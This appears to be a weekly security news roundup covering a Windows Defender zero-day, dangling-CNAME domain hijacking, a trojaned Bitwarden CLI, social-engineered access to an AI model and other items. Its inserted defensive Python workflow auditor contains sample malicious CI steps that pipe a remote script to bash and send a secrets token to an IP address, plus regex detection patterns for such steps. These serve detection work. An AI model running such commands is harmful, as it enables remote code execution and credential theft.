
This Week in Security: Angry Researchers, Hanging DNS, and Potentially Worse Hackers

The author of the BlueHammer exploit, which was released earlier this month and was addressed in the second Patch Tuesday, remains annoyed with the responses from Microsoft’s security research team and vulnerability response team, and has released another Windows zero-day, this one also targeting Windows Defender.

The RedSun exploit targets a logic and timing flaw in Windows Defender, tricking Defender into acting on a target file on the system instead of leaving the file and its program alone. Not, usually, what you would hope would happen.

Since the RedSun attack requires local access in the first place, it seems unlikely that Microsoft will rush out a patch; however, with the code now public, we can expect malware to use it to gain elevated permissions on an already-infected system.

Releasing exploits without fear feels like a throwback to the late 1990s, and honestly, I probably don’t hate it.

University Domains Hacked

As reported on BleepingComputer, a group going by the name “Hazy Hawk” has been hijacking abandoned DNS records belonging to universities and government agencies to serve ad-click spam.

The attack is simple and doesn’t even require compromising the actual institution: it abuses dangling DNS “CNAME” records. A “CNAME” entry in DNS acts as an alias, mapping one domain name to another, and is commonly used to serve content for an official domain from a cloud service whose IP address may change.

A DNS “A” record (or “AAAA” if you speak IPv6) points a hostname – such as “foo.example.com” – to an IP address – such as “1.1.1.1”. A “CNAME” record instead points the hostname to another hostname, such as “foo.some_cloud_host.com”. Scanning “high value” domains (like Ivy League universities) for “CNAME” records that point to expired domains (or to domains on defunct cloud hosting providers) lets anyone register that domain (or create an account with the appropriate name on the cloud host) and publish whatever content they want, and it still appears under the original name.
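The dangling-CNAME check described above, written out as an added example that is not from the original article or from any party it mentions. It follows the CNAME chain for each name in a constructed sample zone and reports which records end at a name that no longer exists; the zone data, hostnames and status labels are assumptions made up for this example, and a real audit would plug a resolver that returns raw CNAME answers into the `lookup` parameter in place of the sample table.

```python
from typing import Callable, Dict, List, Optional, Tuple

# A record is ("A", ip) or ("CNAME", target); None means the name does not exist (NXDOMAIN).
Record = Optional[Tuple[str, str]]
Lookup = Callable[[str], Record]

# Constructed sample zone data for offline demonstration (not real records).
SAMPLE_ZONE: Dict[str, Tuple[str, str]] = {
    "direct.example.edu": ("A", "192.0.2.20"),
    "www.example.edu": ("CNAME", "cdn.example.net"),
    "cdn.example.net": ("A", "192.0.2.10"),
    # Alias left behind after the cloud tenant was torn down: the target no longer exists.
    "alumni.example.edu": ("CNAME", "site.defunct-cloud-host.example"),
    "loop1.example.edu": ("CNAME", "loop2.example.edu"),
    "loop2.example.edu": ("CNAME", "loop1.example.edu"),
}


def sample_lookup(name: str) -> Record:
    """Resolver over the constructed zone above (stand-in for a real DNS query)."""
    return SAMPLE_ZONE.get(name.lower().rstrip("."))


def classify(name: str, lookup: Lookup, max_hops: int = 8) -> Tuple[str, List[str]]:
    """Follow the CNAME chain starting at `name` and return (status, chain).

    status is one of:
      "ok"       - the chain ends at an address record
      "dangling" - a CNAME points at a name that does not exist; if the target's
                   domain or cloud tenant can be registered by anyone, the alias
                   is hijackable and the record should be removed or repointed
      "nxdomain" - the queried name itself does not exist
      "loop"     - the CNAMEs refer back to an earlier name in the chain
      "too_long" - more than max_hops CNAME hops
    """
    chain = [name]
    current = name
    for _ in range(max_hops):
        rec = lookup(current)
        if rec is None:
            return ("nxdomain" if current == name else "dangling", chain)
        rtype, value = rec
        if rtype == "A":
            return ("ok", chain)
        # rtype == "CNAME": follow the alias, watching for cycles
        chain.append(value)
        if value in chain[:-1]:
            return ("loop", chain)
        current = value
    return ("too_long", chain)


def find_dangling(names, lookup: Lookup) -> Dict[str, str]:
    """Map each dangling name to the non-existent target at the end of its chain."""
    out: Dict[str, str] = {}
    for n in names:
        status, chain = classify(n, lookup)
        if status == "dangling":
            out[n] = chain[-1]
    return out


if __name__ == "__main__":
    for host, target in find_dangling(SAMPLE_ZONE, sample_lookup).items():
        print(f"{host} -> {target}  (dangling; remove or repoint this CNAME)")
```

The fix on the defending side is the same regardless of who might claim the target: delete the alias, or point it at a resource the organisation still controls, and schedule the scan to run whenever cloud resources are decommissioned.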

At least 30 academic institutions have been affected, as well as several government agencies including the CDC.

Linux Deprecates Old Network Drivers

The latest patch set to the Linux kernel plans to remove 18 legacy network drivers, citing an increased maintenance burden from bugs turned up by AI and fuzzing tools. This seems to be in line with other recent Linux kernel efforts to deprecate older hardware, in particular moving single-core systems onto the multi-core kernel build and flagging i486 support for removal.

All devices scheduled to go are from 2002 or earlier, and all are ISA or PCMCIA Ethernet devices. In the end, it probably makes sense to remove problematic drivers for devices that have been out of production for 25 years or more, but personally it hurts to see the 3COM 3c59x driver go, as that was the first Ethernet card I had in a Linux system.

Bitwarden CLI Client Vulnerable

Following last month’s theme of supply chain attacks, the latest high-profile casualty is the Bitwarden command-line client. There are indications that this is the same group responsible for the past few weeks of supply chain attacks on NPM, GitHub, and VS Code extensions.

Bitwarden is a password manager with a self-hosting option, similar to LastPass or 1Password. The trojaned version of the Bitwarden CLI contains malicious code that propagates a supply chain botnet by stealing authentication tokens, SSH keys, and AI service tokens. Whenever GitHub tokens are available, the script also tries to modify GitHub Actions workflows – the scripts that run by default for code checks or package builds – to embed itself in any repository the token has write access to.
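As a defender-side check for the workflow tampering described above, here is an added example (not code from the article, from Bitwarden, or from the attackers) that pulls the `run:` steps out of a GitHub Actions workflow file and flags commands that pipe a remote script into a shell, use base64, call eval, or push a secret through a network tool. The workflow YAML, the IP addresses and the heuristic patterns are constructed for this example; the indentation-based extraction handles the common `run: cmd` and `run: |` layouts but is deliberately not a full YAML parser.

```python
import re
from typing import List, Pattern, Tuple

# Constructed sample workflow written for this example (not from any real repository).
# The last two steps are the kind of additions an audit should catch.
SAMPLE_WORKFLOW = """\
name: ci
on: [push, pull_request]
jobs:
  build:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v4
      - run: npm ci
      - name: build
        run: |
          npm run build
          npm pack
      - name: "cache warmup"
        run: curl -s http://203.0.113.7/x.sh | bash
      - name: "telemetry"
        run: echo "${{ secrets.NPM_TOKEN }}" | base64 -w0 | curl -d @- http://203.0.113.7/c
"""

# Heuristic patterns (constructed for this example) that rarely belong in an ordinary CI step.
RISKY_PATTERNS: List[Tuple[str, Pattern[str]]] = [
    ("remote script piped to shell", re.compile(r"\b(curl|wget)\b[^|\n]*\|\s*(ba)?sh\b")),
    ("base64 used in step", re.compile(r"\bbase64\b")),
    ("eval of dynamic content", re.compile(r"\beval\b")),
    ("secret passed to a network tool", re.compile(r"\$\{\{\s*secrets\.[^}]*\}\}[^\n]*\b(curl|wget|nc)\b")),
]

_RUN_KEY = re.compile(r"(?:-\s+)?run:\s*(.*)$")
_BLOCK_INDICATORS = {"|", "|-", "|+", ">", ">-", ">+"}


def extract_run_scripts(text: str) -> List[Tuple[int, str]]:
    """Return (line_number, command) for every shell line under a `run:` key.

    Covers `run: cmd` and `run: |` block scalars. Inside a block, lines indented
    deeper than the `run` key itself belong to the script; the first non-blank
    line at or above that indent ends the block.
    """
    scripts: List[Tuple[int, str]] = []
    key_indent = None  # indent of the `run` key while inside a block scalar
    for lineno, raw in enumerate(text.splitlines(), start=1):
        stripped = raw.strip()
        indent = len(raw) - len(raw.lstrip())
        if key_indent is not None:
            if stripped and indent > key_indent:
                scripts.append((lineno, stripped))
                continue
            if not stripped:
                continue  # blank lines do not end a block scalar
            key_indent = None
        m = _RUN_KEY.match(stripped)
        if not m:
            continue
        body = m.group(1).strip()
        if body in _BLOCK_INDICATORS:
            # For "- run: |" the key sits after the "- " list marker.
            key_indent = indent + (len(stripped) - len(stripped.lstrip("- ")))
        elif body:
            scripts.append((lineno, body))
    return scripts


def audit_workflow(text: str) -> List[Tuple[int, str, str]]:
    """Return (line_number, reason, command) for each run-step command matching a risky pattern."""
    findings: List[Tuple[int, str, str]] = []
    for lineno, cmd in extract_run_scripts(text):
        for reason, pattern in RISKY_PATTERNS:
            if pattern.search(cmd):
                findings.append((lineno, reason, cmd))
    return findings


if __name__ == "__main__":
    for lineno, reason, cmd in audit_workflow(SAMPLE_WORKFLOW):
        print(f"line {lineno}: {reason}: {cmd}")
```

Run it over every file under `.github/workflows/` in CI, or as a pre-receive hook, and treat any finding on a workflow that was not changed by a reviewed pull request as a signal that a token with write access may have been used.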

In many ways, what could have been an incredibly bad incident – the compromise of a password manager’s vaults – turned into a case of the dog catching the car. (If a dog chasing cars actually catches one, would it even know what to do with it?) A surprising turn of events for malware designed to steal information.

Mythos “Hacked”

Anthropic has admitted to “unauthorized access” to its new Mythos model. The company has made many announcements about the risks its new model poses to security and software development, humbly boasting that it is too dangerous for public use. Meanwhile, it appears that AI-focused Discord enthusiasts were able to social engineer their way to access through a third-party Anthropic contractor.

It’s hard to figure out what danger Mythos will actually represent once it’s widely available. As with any new bug-finding tool, the challenge is not just in finding a potential bug, but in confirming that it can be triggered. When the concept of fuzzing – feeding programs invalid or nearly invalid input – became popular, thousands of bugs were quickly discovered. OSS-Fuzz has found about 30,000 bugs in 360 projects, according to this paper. That’s a daunting number of problems to address, but they’re hardly heralded as apocalyptic.

The impact of the new AI on bug detection will have to be assessed in hindsight, but it’s not exactly comforting that the same company making world-changing risk claims about its model was the victim of a social engineering campaign that left the model exposed for weeks.

Nextcloud Ends Bug Bounties

Another week, another project ending its bug bounty program. This week it’s Nextcloud, a self-hosted file hosting platform – basically an open source Dropbox analogue.

Like other projects, Nextcloud blames the flood of low-quality but time-consuming AI-generated bug reports. Starting April 22, 2026, Nextcloud will no longer offer rewards for bug reports, regardless of severity.

iOS Notification Patch

Apple has released iOS 26.4.2, which fixes a notification issue that was recently used to recover Signal messages.

A recent court case showed that it was possible to extract the content of Signal messages from an iPhone, even after the app and its notifications had been removed. This isn’t a bug in Signal itself, even though it’s specific to iOS devices: if Signal is configured to display message content in a notification, that content is no longer under the control of the Signal app. On devices set to show notifications on the lock screen, the message content is also no longer protected by user authentication!

Investigators were able to extract the notification database from the phone and, from there, pull out earlier Signal notifications containing message content that was thought to have been deleted.

$2.5 M Stolen in Sri Lanka

Wrapping up, Newswire reports that Sri Lankan officials have confirmed that $2.5 million was stolen from the Ministry of Finance by redirecting foreign debt payments. Few details are available, but such attacks often take advantage of a compromised email account, using existing email threads to continue the conversation and swap in new payment details.

Similar attacks occur on a smaller scale, often targeting real estate agencies and small banks — institutions that may have little or no information security practices but handle large sums of money. That it happened at the national level is certainly unusual.
